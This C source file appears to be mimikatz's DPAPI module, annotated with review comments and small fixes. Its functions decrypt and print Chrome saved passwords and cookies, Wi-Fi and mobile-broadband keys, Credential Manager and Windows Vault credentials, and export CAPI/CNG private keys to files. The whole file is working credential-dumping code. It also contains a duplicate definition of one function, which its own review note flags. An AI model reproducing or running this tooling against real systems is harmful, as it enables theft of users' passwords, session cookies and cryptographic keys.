/*
 * Parses a CNG private key file (/in:file) and recovers its DPAPI-protected parts.
 *
 * kull_m_key_cng_create splits the file into two DPAPI blobs: the private
 * properties and the private key.  Each one is handed to
 * kuhl_m_dpapi_unprotect_raw_or_blob with its own fixed entropy constant
 * (KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES / KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB).
 * Decrypted properties are described; a decrypted key is hex-dumped and passed
 * to kuhl_m_crypto_exportRawKeyToFile together with the key's name.
 *
 * argc/argv: command-line tokens.  Only /in is consumed here; the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob (key material
 *            options are resolved there, not in this function).
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[])
{
	PBYTE file;
	PVOID out;
	DWORD szFile, outLen, cbProperties;
	PKULL_M_KEY_CNG_BLOB cngKey;
	PKULL_M_KEY_CNG_PROPERTY * properties;
	LPCWSTR infile;
	PWSTR name;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
		{
			/* NOTE(review): szFile is never passed to kull_m_key_cng_create, so the
			   parser has no upper bound for the untrusted file — confirm it validates
			   its own length fields. */
			if(cngKey = kull_m_key_cng_create(file))
			{
				kull_m_key_cng_descr(0, cngKey);
				if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateProperties, cngKey->dwPrivatePropertiesLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES), &out, &outLen, L"Decrypting Private Properties:\n"))
				{
					if(kull_m_key_cng_properties_create(out, outLen, &properties, &cbProperties))
					{
						kull_m_key_cng_properties_descr(0, properties, cbProperties);
						kull_m_key_cng_properties_delete(properties, cbProperties);
					}
					LocalFree(out);
				}
				if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateKey, cngKey->dwPrivateKeyLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB), &out, &outLen, L"Decrypting Private Key:\n"))
				{
					kull_m_string_wprintf_hex(out, outLen, 0);
					kprintf(L"\n");
					/* LPTR zero-fills, so the extra sizeof(wchar_t) guarantees a terminating
					   NUL after the copied name bytes (pName is a byte range, not a C string).
					   dwNameLen comes from the parsed file; presumably kull_m_key_cng_create
					   bounds it — confirm. */
					if(name = (PWSTR) LocalAlloc(LPTR, cngKey->dwNameLen + sizeof(wchar_t)))
					{
						RtlCopyMemory(name, cngKey->pName, cngKey->dwNameLen);
						kuhl_m_crypto_exportRawKeyToFile(out, outLen, TRUE, L"raw", 0, name, TRUE, TRUE);
						LocalFree(name);
					}
					LocalFree(out);
				}
				kull_m_key_cng_delete(cngKey);
			}
			LocalFree(file);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input CNG private key file needed (/in:file)\n");
	return STATUS_SUCCESS;
}
/*
 * Decrypts a Credential Manager file (/in:file) and describes the credential.
 *
 * NOTE(review): a second definition of kuhl_m_dpapi_cred appears later in this
 * listing (the one that also handles the legacy/NT5 layout).  Two definitions of
 * the same function cannot coexist in one translation unit; this one looks like
 * the older revision.
 *
 * The file is treated as a KUHL_M_DPAPI_ENCRYPTED_CRED header whose embedded
 * DPAPI blob is described and then unprotected; the plaintext is parsed with
 * kull_m_cred_create and printed.
 *
 * argc/argv: command-line tokens; only /in is consumed here, the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
{
	PCWSTR infile;
	PVOID file, out;
	DWORD szFile, szOut;
	PKULL_M_CRED_BLOB cred;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
		{
			/* NOTE(review): blobSize is taken from the untrusted file and is not
			   checked against szFile here — confirm the callee bounds its reads. */
			kull_m_dpapi_blob_quick_descr(0, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob);
			if(kuhl_m_dpapi_unprotect_raw_or_blob(((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Credential:\n"))
			{
				if(cred = kull_m_cred_create(out))
				{
					kull_m_cred_descr(0, cred);
					kull_m_cred_delete(cred);
				}
				LocalFree(out);
			}
			LocalFree(file);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input CRED file needed (/in:file)\n");
	return STATUS_SUCCESS;
}
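/*
 * Reads a WWAN (mobile broadband) XML profile (/in:file), prints its Name and
 * AccessString elements, and unprotects the DPAPI blob stored hex-encoded in
 * the SubscriberID element.
 *
 * Fix: the precision argument of the final L"%.*s" was lenDataOut / sizeof(wchar_t),
 * a size_t.  "%.*" consumes an int from the va_list, so on 64-bit builds the
 * argument width did not match and the printed length was undefined.  The value
 * is now cast to int.
 *
 * argc/argv: command-line tokens; only /in is consumed here, the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
{
	PBYTE pFile, hex, dataOut;
	DWORD dwData, lenHex, lenDataOut;
	LPWSTR dataU, dataF;
	LPCWSTR infile;
	PKULL_M_DPAPI_BLOB blob;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, &pFile, &dwData))
		{
			/* NOTE(review): the file buffer is passed as a C string, so a profile
			   without a trailing NUL would be read past dwData — confirm that
			   kull_m_file_readData terminates the buffer. */
			if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
			{
				if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF))
				{
					kprintf(L"Profile \'%s\'\n\n", dataF);
					LocalFree(dataF);
				}
				if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF))
				{
					kprintf(L" * AccessString : %s\n", dataF);
					LocalFree(dataF);
				}
				if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF))
				{
					/* SubscriberID holds a hex string; decode it before parsing the blob. */
					if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
					{
						if(blob = kull_m_dpapi_blob_create(hex))
						{
							kprintf(L"\n");
							kull_m_dpapi_blob_descr(0, blob);
							if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
							{
								kprintf(L" * SubscriberID : ");
								kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
								kprintf(L"\n");
								/* The plaintext is shown as UTF-16 text; the precision bounds the
								   read because dataOut carries no terminator.  Cast to int: the
								   "%.*" precision is read as an int from the variadic arguments. */
								kprintf(L"%.*s", (int) (lenDataOut / sizeof(wchar_t)), dataOut);
								LocalFree(dataOut);
							}
							kull_m_dpapi_blob_delete(blob);
						}
						LocalFree(hex);
					}
					LocalFree(dataF);
				}
				LocalFree(dataU);
			}
			LocalFree(pFile);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n");
	return STATUS_SUCCESS;
}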
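/*
 * Decrypts a Credential Manager file (/in:file) and describes its content.
 *
 * Two on-disk layouts are handled.  If the 16 bytes at offset 4 equal
 * KULL_M_DPAPI_GUID_PROVIDER the whole file is a raw DPAPI blob holding the
 * legacy (NT5) credential set; otherwise the file is a
 * KUHL_M_DPAPI_ENCRYPTED_CRED header whose embedded blob is unprotected.
 *
 * Fix: the legacy detection read a GUID at offset 4 without checking that the
 * file is at least 20 bytes long, so a truncated input caused an out-of-bounds
 * read.  The comparison now runs only when the header is actually present;
 * shorter files fall through to the non-legacy path unchanged.
 *
 * argc/argv: command-line tokens; only /in is consumed here, the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
{
	PCWSTR infile;
	PVOID file, out;
	DWORD szFile, szOut;
	BOOL isNT5Cred;
	PKULL_M_CRED_BLOB cred;
	PKULL_M_CRED_LEGACY_CREDS_BLOB legacyCreds;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
		{
			/* The file is untrusted input: only compare the provider GUID when the
			   DWORD + GUID prefix really fits in what was read. */
			isNT5Cred = (szFile >= sizeof(DWORD) + sizeof(GUID)) && RtlEqualGuid((PBYTE) file + sizeof(DWORD), &KULL_M_DPAPI_GUID_PROVIDER);
			/* NOTE(review): on the non-legacy path blobSize is still taken from the
			   file and not checked against szFile — confirm the callees bound it. */
			kull_m_dpapi_blob_quick_descr(0, isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob);
			if(kuhl_m_dpapi_unprotect_raw_or_blob(isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, isNT5Cred ? szFile : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, isNT5Cred ? L"Decrypting Legacy Credential(s):\n" : L"Decrypting Credential:\n"))
			{
				if(isNT5Cred)
				{
					if(legacyCreds = kull_m_cred_legacy_creds_create(out))
					{
						kull_m_cred_legacy_creds_descr(0, legacyCreds);
						kull_m_cred_legacy_creds_delete(legacyCreds);
					}
				}
				else
				{
					if(cred = kull_m_cred_create(out))
					{
						kull_m_cred_descr(0, cred);
						kull_m_cred_delete(cred);
					}
				}
				LocalFree(out);
			}
			LocalFree(file);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input CRED file needed (/in:file)\n");
	return STATUS_SUCCESS;
}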
/*
 * Decrypts a Windows Vault credential file (/cred:file) using its policy file
 * (/policy:file).
 *
 * Flow: parse and describe the credential, then the policy; unprotect the
 * policy's DPAPI key blob; derive the vault AES-128 and AES-256 keys from it
 * with kull_m_cred_vault_policy_key; then decrypt every attribute of the
 * credential with CryptDecrypt.  Attributes with id 0 or 100 are parsed as a
 * KULL_M_CRED_VAULT_CLEAR structure, other attributes are hex-dumped.
 *
 * NOTE(review): `mode` is initialised to CRYPT_MODE_CBC and never used.
 * NOTE(review): hKey is obtained per attribute from kuhl_m_dpapi_vault_key_type
 * and nothing here calls CryptDestroyKey on it — confirm whether the helper
 * hands back an owned handle that leaks on every iteration.
 * NOTE(review): aes128/aes256 hold key material on the stack and are not
 * cleared before return.
 *
 * argc/argv: command-line tokens; /cred and /policy are consumed here, the rest
 *            are forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[])
{
	PCWSTR inFilePolicy, inFileCred;
	PVOID filePolicy, fileCred, out;
	DWORD szFilePolicy, szFileCred, szOut, len, i, mode = CRYPT_MODE_CBC;
	BYTE aes128[AES_128_KEY_SIZE], aes256[AES_256_KEY_SIZE];
	PKULL_M_CRED_VAULT_POLICY vaultPolicy;
	PKULL_M_CRED_VAULT_CREDENTIAL vaultCredential;
	PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE attribute;
	PKULL_M_CRED_VAULT_CLEAR clear;
	PVOID buffer;
	BOOL isAttr;
	HCRYPTPROV hProv;
	HCRYPTKEY hKey;

	if(kull_m_string_args_byName(argc, argv, L"cred", &inFileCred, NULL))
	{
		if(kull_m_file_readData(inFileCred, (PBYTE *) &fileCred, &szFileCred))
		{
			if(vaultCredential = kull_m_cred_vault_credential_create(fileCred))
			{
				kull_m_cred_vault_credential_descr(0, vaultCredential);
				/* Without /policy the credential is only described, never decrypted. */
				if(kull_m_string_args_byName(argc, argv, L"policy", &inFilePolicy, NULL))
				{
					if(kull_m_file_readData(inFilePolicy, (PBYTE *) &filePolicy, &szFilePolicy))
					{
						if(vaultPolicy = kull_m_cred_vault_policy_create(filePolicy))
						{
							kull_m_cred_vault_policy_descr(0, vaultPolicy);
							if(kuhl_m_dpapi_unprotect_raw_or_blob(vaultPolicy->key->KeyBlob, vaultPolicy->key->dwKeyBlob, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Policy Keys:\n"))
							{
								if(kull_m_cred_vault_policy_key(out, szOut, aes128, aes256))
								{
									kprintf(L" AES128 key: ");
									kull_m_string_wprintf_hex(aes128, AES_128_KEY_SIZE, 0);
									kprintf(L"\n");
									kprintf(L" AES256 key: ");
									kull_m_string_wprintf_hex(aes256, AES_256_KEY_SIZE, 0);
									kprintf(L"\n\n");
									/* CRYPT_VERIFYCONTEXT: an ephemeral provider context, no persisted key container. */
									if(CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
									{
										for(i = 0; i < vaultCredential->__cbElements; i++)
										{
											if(attribute = vaultCredential->attributes[i])
											{
												kprintf(L" > Attribute %u : ", attribute->id);
												if(attribute->data && (len = attribute->szData))
												{
													/* Decrypt a private copy: CryptDecrypt works in place and updates len. */
													if(buffer = LocalAlloc(LPTR, len))
													{
														RtlCopyMemory(buffer, attribute->data, len);
														/* The helper picks the AES key for this attribute and tells us
														   (isAttr) whether the plaintext is an opaque attribute value. */
														if(kuhl_m_dpapi_vault_key_type(attribute, hProv, aes128, aes256, &hKey, &isAttr))
														{
															if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) buffer, &len))
															{
																if(isAttr)
																{
																	kull_m_string_wprintf_hex(buffer, len, 0);
																}
																else
																{
																	kprintf(L"\n");
																	if(!attribute->id || (attribute->id == 100))
																	{
																		if(clear = kull_m_cred_vault_clear_create(buffer))
																		{
																			kull_m_cred_vault_clear_descr(1, clear);
																			kull_m_cred_vault_clear_delete(clear);
																		}
																	}
																	else kull_m_string_wprintf_hex(buffer, len, 1 | (16 << 16));
																	kprintf(L"\n");
																}
															}
															else PRINT_ERROR_AUTO(L"CryptDecrypt");
														}
														LocalFree(buffer);
													}
												}
												kprintf(L"\n");
											}
										}
										CryptReleaseContext(hProv, 0);
									}
								}
								LocalFree(out);
							}
							kull_m_cred_vault_policy_delete(vaultPolicy);
						}
						LocalFree(filePolicy);
					}
					else PRINT_ERROR_AUTO(L"kull_m_file_readData (policy)");
				}
				kull_m_cred_vault_credential_delete(vaultCredential);
			}
			LocalFree(fileCred);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData (cred)");
	}
	else PRINT_ERROR(L"Input Cred file needed (/cred:file)\n");
	return STATUS_SUCCESS;
}
/*
 * Opens a Chrome SQLite database (/in:file) read-only and unprotects the
 * DPAPI-encrypted column of either the `logins` table (password_value) or,
 * failing that, the `cookies` table (encrypted_value).
 *
 * Every row's blob is passed straight to kuhl_m_dpapi_unprotect_raw_or_blob;
 * a row whose value is not a DPAPI blob the helper can unprotect is skipped
 * silently (nothing is printed for it).
 *
 * NOTE(review): the return values of sqlite3_close_v2 and sqlite3_shutdown are
 * stored in rc and then ignored.
 *
 * argc/argv: command-line tokens; only /in is consumed here, the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[])
{
	PCWSTR infile;
	PSTR aInfile;
	int rc;
	sqlite3 *pDb;
	sqlite3_stmt * pStmt;
	LPVOID pDataOut;
	DWORD dwDataOutLen;
	__int64 i64;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		/* sqlite3_open_v2 takes a narrow (UTF-8) path. */
		if(aInfile = kull_m_string_unicode_to_ansi(infile))
		{
			rc = sqlite3_initialize();
			if(rc == SQLITE_OK)
			{
				rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY, NULL);
				if(rc == SQLITE_OK)
				{
					if(kuhl_m_dpapi_chrome_isTableExist(pDb, "logins"))
					{
						rc = sqlite3_prepare_v2(pDb, "select signon_realm, origin_url, username_value, password_value from logins", -1, &pStmt, NULL);
						if(rc == SQLITE_OK)
						{
							while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
							{
								/* Column text is not NUL-terminated for our purposes; the byte count
								   from sqlite3_column_bytes bounds each %.*S. */
								kprintf(L"\nURL : %.*S ( %.*S )\nUsername: %.*S\n", sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0), sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1), sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
								if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 3), sqlite3_column_bytes(pStmt, 3), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
								{
									kprintf(L"Password: %.*S\n", dwDataOutLen, pDataOut);
									LocalFree(pDataOut);
								}
							}
							/* The loop leaves rc at the last step result; anything but DONE is an error. */
							if(rc != SQLITE_DONE)
								PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
						}
						else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
						/* On a failed prepare pStmt is NULL and finalize is a harmless no-op. */
						sqlite3_finalize(pStmt);
					}
					else if(kuhl_m_dpapi_chrome_isTableExist(pDb, "cookies"))
					{
						rc = sqlite3_prepare_v2(pDb, "select host_key, path, name, creation_utc, expires_utc, encrypted_value from cookies order by host_key, path, name", -1, &pStmt, NULL);
						if(rc == SQLITE_OK)
						{
							while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
							{
								kprintf(L"\nHost : %.*S ( %.*S )\nName : %.*S\nDates : ", sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0), sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1), sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
								/* The stored timestamps are multiplied by 10 and shown as FILETIME;
								   presumably they are microseconds on the 1601 epoch — confirm. */
								i64 = sqlite3_column_int64(pStmt, 3) * 10;
								kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
								i64 = sqlite3_column_int64(pStmt, 4) * 10;
								/* A zero expiry means a session cookie: no end date is printed. */
								if(i64)
								{
									kprintf(L" -> ");
									kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
								}
								kprintf(L"\n");
								if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 5), sqlite3_column_bytes(pStmt, 5), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
								{
									kprintf(L"Cookie: %.*S\n", dwDataOutLen, pDataOut);
									LocalFree(pDataOut);
								}
							}
							if(rc != SQLITE_DONE)
								PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
						}
						else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
						sqlite3_finalize(pStmt);
					}
					else PRINT_ERROR(L"Neither the table \'logins\' or the table \'cookies\' exist!\n");
				}
				/* sqlite3_errmsg copes with a NULL handle (out-of-memory case). */
				else PRINT_ERROR(L"sqlite3_open_v2: %S (%S)\n", sqlite3_errmsg(pDb), aInfile);
				/* Close even after a failed open: sqlite allocates the handle in most failure cases. */
				rc = sqlite3_close_v2(pDb);
				rc = sqlite3_shutdown();
			}
			else PRINT_ERROR(L"sqlite3_initialize: 0x%08x\n", rc);
			LocalFree(aInfile);
		}
	}
	else PRINT_ERROR(L"Input \'Login Data\' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Data\")\n");
	return STATUS_SUCCESS;
}
/*
 * Reads a WLAN XML profile (/in:file), prints the profile name, SSID,
 * authentication and encryption elements, and unprotects the DPAPI blob stored
 * hex-encoded in keyMaterial.
 *
 * keyMaterial is only looked at when an authentication element exists, because
 * the authentication value decides how the plaintext is displayed: "WEP" keys
 * are hex-dumped, everything else is printed as a narrow string bounded by
 * lenDataOut.
 *
 * argc/argv: command-line tokens; only /in is consumed here, the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
{
	PBYTE pFile, hex, dataOut;
	DWORD dwData, lenHex, lenDataOut;
	LPWSTR dataU, dataSSID, dataF, dataAuth;
	LPCWSTR infile;
	PKULL_M_DPAPI_BLOB blob;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, &pFile, &dwData))
		{
			/* NOTE(review): the file buffer is passed as a C string; dwData is not
			   used, so a profile without a trailing NUL would be over-read — confirm
			   that kull_m_file_readData terminates the buffer. */
			if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
			{
				if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF))
				{
					kprintf(L"Profile \'%s\'\n\n", dataF);
					LocalFree(dataF);
				}
				if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID))
				{
					kprintf(L" * SSID ");
					/* The SSID element carries either a <name> or a <hex> child. */
					if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF))
					{
						kprintf(L"name : %s\n", dataF);
						LocalFree(dataF);
					}
					else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF))
					{
						kprintf(L"hex : %s\n", dataF);
						LocalFree(dataF);
					}
					else kprintf(L"?\n");
					LocalFree(dataSSID);
				}
				if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth))
				{
					kprintf(L" * Authentication: %s\n", dataAuth);
					if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF))
					{
						kprintf(L" * Encryption : %s\n", dataF);
						LocalFree(dataF);
					}
					if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF))
					{
						/* keyMaterial is a hex string; decode it before parsing the blob. */
						if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
						{
							if(blob = kull_m_dpapi_blob_create(hex))
							{
								kprintf(L"\n");
								kull_m_dpapi_blob_descr(0, blob);
								if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
								{
									kprintf(L" * Key Material : ");
									if(_wcsicmp(dataAuth, L"WEP") == 0)
									{
										kprintf(L"(hex) ");
										kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
									}
									else kprintf(L"%.*S", lenDataOut, dataOut);
									kprintf(L"\n");
									LocalFree(dataOut);
								}
								kull_m_dpapi_blob_delete(blob);
							}
							LocalFree(hex);
						}
						LocalFree(dataF);
					}
					LocalFree(dataAuth);
				}
				LocalFree(dataU);
			}
			LocalFree(pFile);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n");
	return STATUS_SUCCESS;
}
/*
 * Parses a CAPI private key file (/in:file) and recovers its DPAPI-protected parts.
 *
 * kull_m_key_capi_create exposes up to four DPAPI blobs: the export flags and
 * the private key for the AT_SIGNATURE key pair, and the same two for the
 * AT_EXCHANGE key pair.  Export flags are unprotected with the fixed entropy
 * KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS and hex-dumped; private keys are
 * unprotected without entropy, hex-dumped, converted to a generic RSA blob with
 * kull_m_key_capi_decryptedkey_to_raw, and passed to
 * kuhl_m_crypto_exportRawKeyToFile with the key container name
 * (suffixes "raw_signature" / "raw_exchange").
 *
 * The four blocks are independent: a failure in one does not stop the others.
 *
 * argc/argv: command-line tokens; only /in is consumed here, the rest are
 *            forwarded to kuhl_m_dpapi_unprotect_raw_or_blob.
 * Returns STATUS_SUCCESS unconditionally; failures are only reported on the console.
 */
NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[])
{
	PVOID file, out;
	PRSA_GENERICKEY_BLOB blob;
	DWORD szFile, outLen, szBlob;
	PKULL_M_KEY_CAPI_BLOB capiKey;
	LPCWSTR infile;
	PWSTR name;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
		{
			/* NOTE(review): szFile is never passed to kull_m_key_capi_create, so the
			   parser has no upper bound for the untrusted file — confirm it validates
			   its own length fields. */
			if(capiKey = kull_m_key_capi_create(file))
			{
				kull_m_key_capi_descr(0, capiKey);
				if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiExportFlag, capiKey->dwSiExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_SIGNATURE Export flags:\n"))
				{
					kull_m_string_wprintf_hex(out, outLen, 0);
					kprintf(L"\n");
					LocalFree(out);
				}
				if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiPrivateKey, capiKey->dwSiPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_SIGNATURE Private Key:\n"))
				{
					kull_m_string_wprintf_hex(out, outLen, 0);
					kprintf(L"\n");
					if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
					{
						/* pName is an ANSI string in the file; the export helper wants UTF-16. */
						if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
						{
							kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_signature", 0, name, TRUE, TRUE);
							LocalFree(name);
						}
						LocalFree(blob);
					}
					LocalFree(out);
				}
				if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExExportFlag, capiKey->dwExExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_EXCHANGE Export flags:\n"))
				{
					kull_m_string_wprintf_hex(out, outLen, 0);
					kprintf(L"\n");
					LocalFree(out);
				}
				if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExPrivateKey, capiKey->dwExPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_EXCHANGE Private Key:\n"))
				{
					kull_m_string_wprintf_hex(out, outLen, 0);
					kprintf(L"\n");
					if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
					{
						if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
						{
							kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_exchange", 0, name, TRUE, TRUE);
							LocalFree(name);
						}
						LocalFree(blob);
					}
					LocalFree(out);
				}
				kull_m_key_capi_delete(capiKey);
			}
			LocalFree(file);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input CAPI private key file needed (/in:file)\n");
	return STATUS_SUCCESS;
}